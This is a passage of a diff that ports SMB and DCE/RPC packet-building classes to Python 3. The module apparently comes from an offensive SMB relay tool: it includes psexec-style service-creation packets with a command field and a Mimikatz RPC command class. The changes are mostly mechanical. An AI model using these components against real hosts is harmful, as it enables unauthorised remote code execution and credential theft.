-        	("VCNumber","\x00\x00"),
-        	("SessionKey", "\x00\x00\x00\x00"),
-                ###NTLMPACKET
-		("Data",                  ""),
-                ###NTLMPACKET
-	])
+    fields = OrderedDict([
+            ("Wordcount", "\x0c"),
+            ("AndXCommand", "\xff"),
+            ("Reserved","\x00" ),
+            ("AndXOffset", "\xec\x00"),
+            ("MaxBuff","\xff\xff"),
+            ("MaxMPX", "\x32\x00"),
+            ("VCNumber","\x00\x00"),
+            ("SessionKey", "\x00\x00\x00\x00"),
+            ###NTLMPACKET
+            ("Data",                  ""),
+            ###NTLMPACKET
+    ])
 
 class SMBSessEmpty(Packet):
-	fields = OrderedDict([
-		("Empty",       "\x00\x00\x00"),
-	])
+    fields = OrderedDict([
+            ("Empty",       "\x00\x00\x00"),
+    ])
 ##################SMB Request Packet##########################
 class SMBHeader(Packet):
     fields = OrderedDict([
@@ -237,9 +251,9 @@ class SMBNegoCairo(Packet):
         ("Bcc", "\x62\x00"),
         ("Data", "")
     ])
-    
+
     def calculate(self):
-        self.fields["Bcc"] = struct.pack("<H",len(str(self.fields["Data"])))
+        self.fields["Bcc"] = StructWithLenPython2or3("<H",len(str(self.fields["Data"])))
 
 class SMBNegoCairoData(Packet):
     fields = OrderedDict([
@@ -252,14 +266,14 @@ class SMBSessionSetupAndxNEGO(Packet):
         ("Wordcount", "\x0c"),
         ("AndXCommand", "\xff"),
         ("Reserved","\x00" ),
-        ("AndXOffset", "\xec\x00"),              
+        ("AndXOffset", "\xec\x00"),
         ("MaxBuff","\xff\xff"),
         ("MaxMPX", "\x32\x00"),
         ("VCNumber","\x00\x00"),
         ("SessionKey", "\x00\x00\x00\x00"),
         ("SecBlobLen","\x4a\x00"),
         ("Reserved2","\x00\x00\x00\x00"),
-        ("Capabilities", "\xfc\xe3\x01\x80"), 
+        ("Capabilities", "\xfc\xe3\x01\x80"),
         ("Bcc","\xb1\x00"),
         ##gss api starts here.
         ("ApplicationHeaderTag","\x60"),
@@ -292,10 +306,10 @@ class SMBSessionSetupAndxNEGO(Packet):
         ("NativeLanTerminator","\x00\x00\x00\x00"),
 
     ])
-    def calculate(self): 
+    def calculate(self):
 
-        self.fields["NativeOs"] = self.fields["NativeOs"].encode('utf-16le')
-        self.fields["NativeLan"] = self.fields["NativeLan"].encode('utf-16le')
+        self.fields["NativeOs"] = self.fields["NativeOs"].encode('utf-16le').decode('latin-1')
+        self.fields["NativeLan"] = self.fields["NativeLan"].encode('utf-16le').decode('latin-1')
 
         CompleteSMBPacketLen = str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["AndXOffset"])+str(self.fields["MaxBuff"])+str(self.fields["MaxMPX"])+str(self.fields["VCNumber"])+str(self.fields["SessionKey"])+str(self.fields["SecBlobLen"])+str(self.fields["Reserved2"])+str(self.fields["Capabilities"])+str(self.fields["Bcc"])+str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["AsnSecMechStr"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagStrLen"])+str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["Data"])+str(self.fields["NegTokenInitSeqMechMessageVersionTerminator"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanTerminator"])
 
@@ -312,34 +326,34 @@ class SMBSessionSetupAndxNEGO(Packet):
         data6 = str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["Data"])
 
         data10 = str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])
-       
+
         data11 = str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])
 
 
         ## Packet len
-        self.fields["AndXOffset"] = struct.pack("<h", len(CompleteSMBPacketLen)+32)
+        self.fields["AndXOffset"] = StructWithLenPython2or3("<h", len(CompleteSMBPacketLen)+32)
         ##Buff Len
-        self.fields["SecBlobLen"] = struct.pack("<h", len(SecBlobLen))
+        self.fields["SecBlobLen"] = StructWithLenPython2or3("<h", len(SecBlobLen))
         ##Complete Buff Len
-        self.fields["Bcc"] = struct.pack("<h", len(CompleteSMBPacketLen)-27)#session setup struct is 27.
+        self.fields["Bcc"] = StructWithLenPython2or3("<h", len(CompleteSMBPacketLen)-27)#session setup struct is 27.
         ##App Header
-        self.fields["ApplicationHeaderLen"] = struct.pack("<B", len(SecBlobLen)-2)
+        self.fields["ApplicationHeaderLen"] = StructWithLenPython2or3("<B", len(SecBlobLen)-2)
         ##Asn Field 1
-        self.fields["AsnSecMechLen"] = struct.pack("<B", len(str(self.fields["AsnSecMechStr"])))
+        self.fields["AsnSecMechLen"] = StructWithLenPython2or3("<B", len(str(self.fields["AsnSecMechStr"])))
         ##Asn Field 1
-        self.fields["ChoosedTagStrLen"] = struct.pack("<B", len(data3))
+        self.fields["ChoosedTagStrLen"] = StructWithLenPython2or3("<B", len(data3))
         ##SpNegoTokenLen
-        self.fields["NegTokenInitSeqHeadLen"] = struct.pack("<B", len(data4))
+        self.fields["NegTokenInitSeqHeadLen"] = StructWithLenPython2or3("<B", len(data4))
         ##NegoTokenInit
-        self.fields["NegTokenInitSeqHeadLen1"] = struct.pack("<B", len(data10)) 
+        self.fields["NegTokenInitSeqHeadLen1"] = StructWithLenPython2or3("<B", len(data10))
         ## Tag0 Len
-        self.fields["NegTokenInitSeqNLMPLen"] = struct.pack("<B", len(data11))
+        self.fields["NegTokenInitSeqNLMPLen"] = StructWithLenPython2or3("<B", len(data11))
         ## Tag0 Str Len
-        self.fields["NegTokenInitSeqNLMPTag1Len"] = struct.pack("<B", len(str(self.fields["NegTokenInitSeqNLMPTag1Str"])))
+        self.fields["NegTokenInitSeqNLMPTag1Len"] = StructWithLenPython2or3("<B", len(str(self.fields["NegTokenInitSeqNLMPTag1Str"])))
         ## Tag2 Len
-        self.fields["NegTokenInitSeqNLMPTag2Len"] = struct.pack("<B", len(data6))
+        self.fields["NegTokenInitSeqNLMPTag2Len"] = StructWithLenPython2or3("<B", len(data6))
         ## Tag3 Len
-        self.fields["NegTokenInitSeqNLMPTag2OctetLen"] = struct.pack("<B", len(str(self.fields["Data"])))
+        self.fields["NegTokenInitSeqNLMPTag2OctetLen"] = StructWithLenPython2or3("<B", len(str(self.fields["Data"])))
 
 
 class SMBSessionSetupAndxAUTH(Packet):
@@ -355,7 +369,7 @@ class SMBSessionSetupAndxAUTH(Packet):
         ("securitybloblength","\x59\x00"),
         ("reserved2","\x00\x00\x00\x00"),
         ("capabilities", "\xfc\xe3\x01\x80"),
-        ("bcc1","\xbf\x00"), 
+        ("bcc1","\xbf\x00"),
         ("ApplicationHeaderTag","\xa1"),
         ("ApplicationHeaderTagLenOfLen","\x81"),
         ("ApplicationHeaderLen","\xd1"),
@@ -381,59 +395,59 @@ class SMBSessionSetupAndxAUTH(Packet):
         ])
 
 
-    def calculate(self): 
-        self.fields["NativeOs"] = self.fields["NativeOs"].encode('utf-16le')
-        self.fields["NativeLan"] = self.fields["NativeLan"].encode('utf-16le')
+    def calculate(self):
+        self.fields["NativeOs"] = self.fields["NativeOs"].encode('utf-16le').decode('latin-1')
+        self.fields["NativeLan"] = self.fields["NativeLan"].encode('utf-16le').decode('latin-1')
 
         SecurityBlobLen = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"])
 
         NTLMData = str(self.fields["Data"])
-	###### ASN Stuff
+        ###### ASN Stuff
         if len(NTLMData) > 255:
-	   self.fields["ApplicationHeaderTagLenOfLen"] = "\x82"
-	   self.fields["ApplicationHeaderLen"] = struct.pack(">H", len(SecurityBlobLen)-0)
+            self.fields["ApplicationHeaderTagLenOfLen"] = "\x82"
+            self.fields["ApplicationHeaderLen"] = StructWithLenPython2or3(">H", len(SecurityBlobLen)-0)
         else:
-           self.fields["ApplicationHeaderTagLenOfLen"] = "\x81"
-	   self.fields["ApplicationHeaderLen"] = struct.pack(">B", len(SecurityBlobLen)-3)
+            self.fields["ApplicationHeaderTagLenOfLen"] = "\x81"
+            self.fields["ApplicationHeaderLen"] = StructWithLenPython2or3(">B", len(SecurityBlobLen)-3)
 
         if len(NTLMData)-8 > 255:
-           self.fields["AsnSecMechLenOfLen"] = "\x82"
-	   self.fields["AsnSecMechLen"] = struct.pack(">H", len(SecurityBlobLen)-4)
+            self.fields["AsnSecMechLenOfLen"] = "\x82"
+            self.fields["AsnSecMechLen"] = StructWithLenPython2or3(">H", len(SecurityBlobLen)-4)
         else:
-           self.fields["AsnSecMechLenOfLen"] = "\x81"
-	   self.fields["AsnSecMechLen"] = struct.pack(">B", len(SecurityBlobLen)-6)
+            self.fields["AsnSecMechLenOfLen"] = "\x81"
+            self.fields["AsnSecMechLen"] = StructWithLenPython2or3(">B", len(SecurityBlobLen)-6)
 
         if len(NTLMData)-12 > 255:
-           self.fields["ChoosedTagLenOfLen"] = "\x82"
-           self.fields["ChoosedTagLen"] = struct.pack(">H", len(SecurityBlobLen)-8) 
+            self.fields["ChoosedTagLenOfLen"] = "\x82"
+            self.fields["ChoosedTagLen"] = StructWithLenPython2or3(">H", len(SecurityBlobLen)-8)
         else:
-           self.fields["ChoosedTagLenOfLen"] = "\x81"
-           self.fields["ChoosedTagLen"] = struct.pack(">B", len(SecurityBlobLen)-9)
+            self.fields["ChoosedTagLenOfLen"] = "\x81"
+            self.fields["ChoosedTagLen"] = StructWithLenPython2or3(">B", len(SecurityBlobLen)-9)
 
         if len(NTLMData)-16 > 255:
-           self.fields["ChoosedTag1StrLenOfLen"] = "\x82"
-           self.fields["ChoosedTag1StrLen"] = struct.pack(">H", len(SecurityBlobLen)-12)
+            self.fields["ChoosedTag1StrLenOfLen"] = "\x82"
+            self.fields["ChoosedTag1StrLen"] = StructWithLenPython2or3(">H", len(SecurityBlobLen)-12)
         else:
-           self.fields["ChoosedTag1StrLenOfLen"] = "\x81"
-           self.fields["ChoosedTag1StrLen"] = struct.pack(">B", len(SecurityBlobLen)-12)
+            self.fields["ChoosedTag1StrLenOfLen"] = "\x81"
+            self.fields["ChoosedTag1StrLen"] = StructWithLenPython2or3(">B", len(SecurityBlobLen)-12)
 
         CompletePacketLen = str(self.fields["wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["reserved"])+str(self.fields["andxoffset"])+str(self.fields["maxbuff"])+str(self.fields["maxmpx"])+str(self.fields["vcnum"])+str(self.fields["sessionkey"])+str(self.fields["securitybloblength"])+str(self.fields["reserved2"])+str(self.fields["capabilities"])+str(self.fields["bcc1"])+str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"])+str(self.fields["NLMPAuthMsgNull"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["ExtraNull"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanTerminator"])
 
         SecurityBlobLenUpdated = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"])
 
         ## Packet len
-        self.fields["andxoffset"] = struct.pack("<h", len(CompletePacketLen)+32) #SMB1 Header is always 32
+        self.fields["andxoffset"] = StructWithLenPython2or3("<h", len(CompletePacketLen)+32) #SMB1 Header is always 32
         ##Buff Len
-        self.fields["securitybloblength"] = struct.pack("<h", len(SecurityBlobLenUpdated))
+        self.fields["securitybloblength"] = StructWithLenPython2or3("<h", len(SecurityBlobLenUpdated))
         ##Complete Buff Len
-        self.fields["bcc1"] = struct.pack("<h", len(CompletePacketLen)-27) #SessionSetup struct is 27.
+        self.fields["bcc1"] = StructWithLenPython2or3("<h", len(CompletePacketLen)-27) #SessionSetup struct is 27.
 
 class SMBTreeConnectData(Packet):
     fields = OrderedDict([
         ("Wordcount", "\x04"),
         ("AndXCommand", "\xff"),
         ("Reserved","\x00" ),
-        ("Andxoffset", "\x5a\x00"), 
+        ("Andxoffset", "\x5a\x00"),
         ("Flags","\x08\x00"),
         ("PasswdLen", "\x01\x00"),
         ("Bcc","\x2f\x00"),
@@ -444,21 +458,21 @@ class SMBTreeConnectData(Packet):
         ("Terminator", "\x00"),
 
     ])
-    def calculate(self): 
+    def calculate(self):
         ##Convert Path to Unicode first before any Len calc.
-        self.fields["Path"] = self.fields["Path"].encode('utf-16le')
+        self.fields["Path"] = self.fields["Path"].encode('utf-16le').decode('latin-1')
 
         ##Passwd Len
-        self.fields["PasswdLen"] = struct.pack("<i", len(str(self.fields["Passwd"])))[:2]
+        self.fields["PasswdLen"] = StructWithLenPython2or3("<i", len(str(self.fields["Passwd"])))[:2]
 
         ##Packet len
         CompletePacket = str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["Andxoffset"])+str(self.fields["Flags"])+str(self.fields["PasswdLen"])+str(self.fields["Bcc"])+str(self.fields["Passwd"])+str(self.fields["Path"])+str(self.fields["PathTerminator"])+str(self.fields["Service"])+str(self.fields["Terminator"])
 
-        self.fields["Andxoffset"] = struct.pack("<i", len(CompletePacket)+32)[:2]
+        self.fields["Andxoffset"] = StructWithLenPython2or3("<i", len(CompletePacket)+32)[:2]
 
         ##Bcc Buff Len
         BccComplete    = str(self.fields["Passwd"])+str(self.fields["Path"])+str(self.fields["PathTerminator"])+str(self.fields["Service"])+str(self.fields["Terminator"])
-        self.fields["Bcc"] = struct.pack("<i", len(BccComplete))[:2]
+        self.fields["Bcc"] = StructWithLenPython2or3("<i", len(BccComplete))[:2]
 
 class SMBTreeDisconnect(Packet):
     fields = OrderedDict([
@@ -481,7 +495,7 @@ class SMBNTCreateData(Packet):
         ("AllocSize",     "\x00\x00\x00\x00\x00\x00\x00\x00"),
         ("FileAttrib",    "\x00\x00\x00\x00"),
         ("ShareAccess",   "\x03\x00\x00\x00"),
-        ("Disposition",   "\x01\x00\x00\x00"),   
+        ("Disposition",   "\x01\x00\x00\x00"),
         ("CreateOptions", "\x40\x00\x40\x00"),
         ("Impersonation", "\x02\x00\x00\x00"),
         ("SecurityFlags", "\x01"),
@@ -492,8 +506,8 @@ class SMBNTCreateData(Packet):
 
     def calculate(self):
         Data1= str(self.fields["FileName"])+str(self.fields["FileNameNull"])
-        self.fields["FileNameLen"] = struct.pack("<h",len(str(self.fields["FileName"])))
-        self.fields["Bcc"] = struct.pack("<h",len(Data1))
+        self.fields["FileNameLen"] = StructWithLenPython2or3("<h",len(str(self.fields["FileName"])))
+        self.fields["Bcc"] = StructWithLenPython2or3("<h",len(Data1))
 
 class SMBNTCreateDataSVCCTL(Packet):
     fields = OrderedDict([
@@ -509,7 +523,7 @@ class SMBNTCreateDataSVCCTL(Packet):
         ("AllocSize",     "\x00\x00\x00\x00\x00\x00\x00\x00"),
         ("FileAttrib",    "\x00\x00\x00\x00"),
         ("ShareAccess",   "\x07\x00\x00\x00"),
-        ("Disposition",   "\x01\x00\x00\x00"),   
+        ("Disposition",   "\x01\x00\x00\x00"),
         ("CreateOptions", "\x00\x00\x00\x00"),
         ("Impersonation", "\x02\x00\x00\x00"),
         ("SecurityFlags", "\x00"),
@@ -520,15 +534,15 @@ class SMBNTCreateDataSVCCTL(Packet):
 
     def calculate(self):
         Data1= str(self.fields["FileName"])+str(self.fields["FileNameNull"])
-        self.fields["FileNameLen"] = struct.pack("<h",len(str(self.fields["FileName"])))
-        self.fields["Bcc"] = struct.pack("<h",len(Data1))
+        self.fields["FileNameLen"] = StructWithLenPython2or3("<h",len(str(self.fields["FileName"])))
+        self.fields["Bcc"] = StructWithLenPython2or3("<h",len(Data1))
 
 class SMBLockingAndXResponse(Packet):
     fields = OrderedDict([
         ("Wordcount",     "\x02"),
         ("AndXCommand",   "\xff"),
         ("Reserved",      "\x00"),
-        ("Andxoffset",    "\x00\x00"),  
+        ("Andxoffset",    "\x00\x00"),
         ("Bcc",           "\x00\x00"),
     ])
 
@@ -539,18 +553,18 @@ class SMBReadData(Packet):
         ("Reserved",      "\x00" ),
         ("Andxoffset",    "\x00\x00"),
         ("FID",           "\x00\x00"),
-        ("Offset",        "\x19\x03\x00\x00"), 
+        ("Offset",        "\x19\x03\x00\x00"),
         ("MaxCountLow",   "\xed\x01"),
         ("MinCount",      "\xed\x01"),
         ("Hidden",        "\xff\xff\xff\xff"),
-        ("Remaining",     "\x00\x00"),  
+        ("Remaining",     "\x00\x00"),
         ("Bcc",           "\x00\x00"),
         ("Data", ""),
     ])
 
     def calculate(self):
 
-        self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
+        self.fields["Bcc"] = StructWithLenPython2or3("<h",len(str(self.fields["Data"])))
 
 class SMBWriteData(Packet):
     fields = OrderedDict([
@@ -566,7 +580,7 @@ class SMBWriteData(Packet):
         ("DataLenHi",     "\x00\x00"),
         ("DataLenLow",    "\xdc\x02"),
         ("DataOffset",    "\x40\x00"),
-        ("HiOffset",      "\x00\x00\x00\x00"),   
+        ("HiOffset",      "\x00\x00\x00\x00"),
         ("Bcc",           "\xdc\x02"),
         ("Padding",       "\x41"),
         ("Data", ""),
@@ -574,8 +588,8 @@ class SMBWriteData(Packet):
 
     def calculate(self):
 
-        self.fields["DataLenLow"] = struct.pack("<H",len(str(self.fields["Data"])))
-        self.fields["Bcc"] = struct.pack("<H",len(str(self.fields["Data"])))
+        self.fields["DataLenLow"] = StructWithLenPython2or3("<H",len(str(self.fields["Data"])))
+        self.fields["Bcc"] = StructWithLenPython2or3("<H",len(str(self.fields["Data"])))
 
 class SMBDCERPCWriteData(Packet):
     fields = OrderedDict([
@@ -591,15 +605,15 @@ class SMBDCERPCWriteData(Packet):
         ("DataLenHi",     "\x00\x00"),
         ("DataLenLow",    "\xdc\x02"),
         ("DataOffset",    "\x3f\x00"),
-        ("HiOffset",      "\x00\x00\x00\x00"),   
+        ("HiOffset",      "\x00\x00\x00\x00"),
         ("Bcc",           "\xdc\x02"),
         ("Data", ""),
     ])
 
     def calculate(self):
-        self.fields["Remaining"] = struct.pack("<h",len(str(self.fields["Data"])))
-        self.fields["DataLenLow"] = struct.pack("<h",len(str(self.fields["Data"])))
-        self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
+        self.fields["Remaining"] = StructWithLenPython2or3("<h",len(str(self.fields["Data"])))
+        self.fields["DataLenLow"] = StructWithLenPython2or3("<h",len(str(self.fields["Data"])))
+        self.fields["Bcc"] = StructWithLenPython2or3("<h",len(str(self.fields["Data"])))
 
 
 
@@ -633,24 +647,24 @@ class SMBTransDCERPC(Packet):
     def calculate(self):
         #Padding
         if len(str(self.fields["Data"]))%2==0:
-           self.fields["PipeTerminator"] = "\x00\x00\x00\x00"
+            self.fields["PipeTerminator"] = "\x00\x00\x00\x00"
         else:
-           self.fields["PipeTerminator"] = "\x00\x00\x00"
+            self.fields["PipeTerminator"] = "\x00\x00\x00"
         ##Convert Path to Unicode first before any Len calc.
-        self.fields["PipeName"] = self.fields["PipeName"].encode('utf-16le')
+        self.fields["PipeName"] = self.fields["PipeName"].encode('utf-16le').decode('latin-1')
 
         ##Data Len
-        self.fields["TotalDataCount"] = struct.pack("<h", len(str(self.fields["Data"])))
-        self.fields["DataCount"] = struct.pack("<h", len(str(self.fields["Data"])))
+        self.fields["TotalDataCount"] = StructWithLenPython2or3("<h", len(str(self.fields["Data"])))
+        self.fields["DataCount"] = StructWithLenPython2or3("<h", len(str(self.fields["Data"])))
 
         ##Packet len
         FindRAPOffset = str(self.fields["Wordcount"])+str(self.fields["TotalParamCount"])+str(self.fields["TotalDataCount"])+str(self.fields["MaxParamCount"])+str(self.fields["MaxDataCount"])+str(self.fields["MaxSetupCount"])+str(self.fields["Reserved"])+str(self.fields["Flags"])+str(self.fields["Timeout"])+str(self.fields["Reserved1"])+str(self.fields["ParamCount"])+str(self.fields["ParamOffset"])+str(self.fields["DataCount"])+str(self.fields["DataOffset"])+str(self.fields["SetupCount"])+str(self.fields["Reserved2"])+str(self.fields["OpNum"])+str(self.fields["FID"])+str(self.fields["Bcc"])+str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])
 
-        self.fields["ParamOffset"] = struct.pack("<h", len(FindRAPOffset)+32)
-        self.fields["DataOffset"] = struct.pack("<h", len(FindRAPOffset)+32)
+        self.fields["ParamOffset"] = StructWithLenPython2or3("<h", len(FindRAPOffset)+32)
+        self.fields["DataOffset"] = StructWithLenPython2or3("<h", len(FindRAPOffset)+32)
         ##Bcc Buff Len
         BccComplete    = str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])+str(self.fields["Data"])
-        self.fields["Bcc"] = struct.pack("<h", len(BccComplete))
+        self.fields["Bcc"] = StructWithLenPython2or3("<h", len(BccComplete))
 
 
 class SMBDCEData(Packet):
@@ -682,7 +696,7 @@ class SMBDCEData(Packet):
         Data1= str(self.fields["Version"])+str(self.fields["VersionLow"])+str(self.fields["PacketType"])+str(self.fields["PacketFlag"])+str(self.fields["DataRepresent"])+str(self.fields["FragLen"])+str(self.fields["AuthLen"])+str(self.fields["CallID"])+str(self.fields["MaxTransFrag"])+str(self.fields["MaxRecvFrag"])+str(self.fields["GroupAssoc"])+str(self.fields["CTXNumber"])+str(self.fields["CTXPadding"])+str(self.fields["CTX0ContextID"])+str(self.fields["CTX0ItemNumber"])+str(self.fields["CTX0UID"])+str(self.fields["CTX0UIDVersion"])+str(self.fields["CTX0UIDVersionlo"])+str(self.fields["CTX0UIDSyntax"])+str(self.fields["CTX0UIDSyntaxVer"])
 
 
-        self.fields["FragLen"] = struct.pack("<h",len(Data1))
+        self.fields["FragLen"] = StructWithLenPython2or3("<h",len(Data1))
 
 class SMBDCEPacketData(Packet):
     fields = OrderedDict([
@@ -705,8 +719,8 @@ class SMBDCEPacketData(Packet):
 
         Data1= str(self.fields["Version"])+str(self.fields["VersionLow"])+str(self.fields["PacketType"])+str(self.fields["PacketFlag"])+str(self.fields["DataRepresent"])+str(self.fields["FragLen"])+str(self.fields["AuthLen"])+str(self.fields["CallID"])+str(self.fields["AllocHint"])+str(self.fields["ContextID"])+str(self.fields["Opnum"])+str(self.fields["Data"])
 
-        self.fields["FragLen"] = struct.pack("<h",len(Data1))
-        self.fields["AllocHint"] = struct.pack("<i",len(str(self.fields["Data"])))
+        self.fields["FragLen"] = StructWithLenPython2or3("<h",len(Data1))
+        self.fields["AllocHint"] = StructWithLenPython2or3("<i",len(str(self.fields["Data"])))
 
 ###Psexec
 class SMBDCESVCCTLOpenManagerW(Packet):
@@ -724,13 +738,13 @@ class SMBDCESVCCTLOpenManagerW(Packet):
     def calculate(self):
         #Padding
         if len(str(self.fields["MachineName"]))%2==0:
-           self.fields["MachineNameNull"] = "\x00\x00\x00\x00"
+            self.fields["MachineNameNull"] = "\x00\x00\x00\x00"
         else:
-           self.fields["MachineNameNull"] = "\x00\x00"
+            self.fields["MachineNameNull"] = "\x00\x00"
         ## Convert to UTF-16LE
-        self.fields["MaxCount"] = struct.pack("<i",len(str(self.fields["MachineName"]))+1)
-        self.fields["ActualCount"] = struct.pack("<i",len(str(self.fields["MachineName"]))+1)
-        self.fields["MachineName"] = self.fields["MachineName"].encode('utf-16le')
+        self.fields["MaxCount"] = StructWithLenPython2or3("<i",len(str(self.fields["MachineName"]))+1)
+        self.fields["ActualCount"] = StructWithLenPython2or3("<i",len(str(self.fields["MachineName"]))+1)
+        self.fields["MachineName"] = self.fields["MachineName"].encode('utf-16le').decode('latin-1')
 
 class SMBDCESVCCTLCreateService(Packet):
     fields = OrderedDict([
@@ -761,7 +775,7 @@ class SMBDCESVCCTLCreateService(Packet):
         ("DependenciesLen",      "\x00\x00\x00\x00"),
         ("ServiceStartUser",     "\x00\x00\x00\x00"),
         ("Password",             "\x00\x00\x00\x00"),
-        ("PasswordLen",          "\x00\x00\x00\x00"), 
+        ("PasswordLen",          "\x00\x00\x00\x00"),
         ("Padding",              "\x00\x00"),
 
     ])
@@ -771,22 +785,22 @@ class SMBDCESVCCTLCreateService(Packet):
 
         #Padding
         if len(str(self.fields["BinCMD"]))%2==0:
-           self.fields["LoadOrderGroup"] = "\x00\x00\x00\x00"
+            self.fields["LoadOrderGroup"] = "\x00\x00\x00\x00"
         else:
-           self.fields["LoadOrderGroup"] = "\x00\x00"
+            self.fields["LoadOrderGroup"] = "\x00\x00"
 
         ## Calculate first
-        self.fields["BinPathMaxCount"] = struct.pack("<i",len(BinDataLen)+1)
-        self.fields["BinPathActualCount"] = struct.pack("<i",len(BinDataLen)+1)
-        self.fields["MaxCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
-        self.fields["ActualCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
-        self.fields["MaxCountRefID"] = struct.pack("<i",len(str(self.fields["DisplayNameID"]))+1)
-        self.fields["ActualCountRefID"] = struct.pack("<i",len(str(self.fields["DisplayNameID"]))+1)
+        self.fields["BinPathMaxCount"] = StructWithLenPython2or3("<i",len(BinDataLen)+1)
+        self.fields["BinPathActualCount"] = StructWithLenPython2or3("<i",len(BinDataLen)+1)
+        self.fields["MaxCount"] = StructWithLenPython2or3("<i",len(str(self.fields["ServiceName"]))+1)
+        self.fields["ActualCount"] = StructWithLenPython2or3("<i",len(str(self.fields["ServiceName"]))+1)
+        self.fields["MaxCountRefID"] = StructWithLenPython2or3("<i",len(str(self.fields["DisplayNameID"]))+1)
+        self.fields["ActualCountRefID"] = StructWithLenPython2or3("<i",len(str(self.fields["DisplayNameID"]))+1)
 
         ## Then convert to UTF-16LE
-        self.fields["ServiceName"] = self.fields["ServiceName"].encode('utf-16le')
-        self.fields["DisplayNameID"] = self.fields["DisplayNameID"].encode('utf-16le')
-        self.fields["BinCMD"] = self.fields["BinCMD"].encode('utf-16le')
+        self.fields["ServiceName"] = self.fields["ServiceName"].encode('utf-16le').decode('latin-1')
+        self.fields["DisplayNameID"] = self.fields["DisplayNameID"].encode('utf-16le').decode('latin-1')
+        self.fields["BinCMD"] = self.fields["BinCMD"].encode('utf-16le').decode('latin-1')
 
 class SMBDCESVCCTLOpenService(Packet):
     fields = OrderedDict([
@@ -802,14 +816,14 @@ class SMBDCESVCCTLOpenService(Packet):
     def calculate(self):
         #Padding
         if len(str(self.fields["ServiceName"]))%2==0:
-           self.fields["ServiceNameNull"] = "\x00\x00\x00\x00"
+            self.fields["ServiceNameNull"] = "\x00\x00\x00\x00"
         else:
-           self.fields["ServiceNameNull"] = "\x00\x00"
+            self.fields["ServiceNameNull"] = "\x00\x00"
         ## Calculate first
-        self.fields["MaxCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
-        self.fields["ActualCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
+        self.fields["MaxCount"] = StructWithLenPython2or3("<i",len(str(self.fields["ServiceName"]))+1)
+        self.fields["ActualCount"] = StructWithLenPython2or3("<i",len(str(self.fields["ServiceName"]))+1)
         ## Then convert to UTF-16LE
-        self.fields["ServiceName"] = self.fields["ServiceName"].encode('utf-16le')
+        self.fields["ServiceName"] = self.fields["ServiceName"].encode('utf-16le').decode('latin-1')
 
 class SMBDCESVCCTLStartService(Packet):
     fields = OrderedDict([
@@ -848,9 +862,9 @@ class SMBDCEMimiKatzRPCCommand(Packet):
     ])
 
     def calculate(self):
-        self.fields["ContextHandleLen"] = struct.pack("<i",len(str(self.fields["CMD"]))+1)
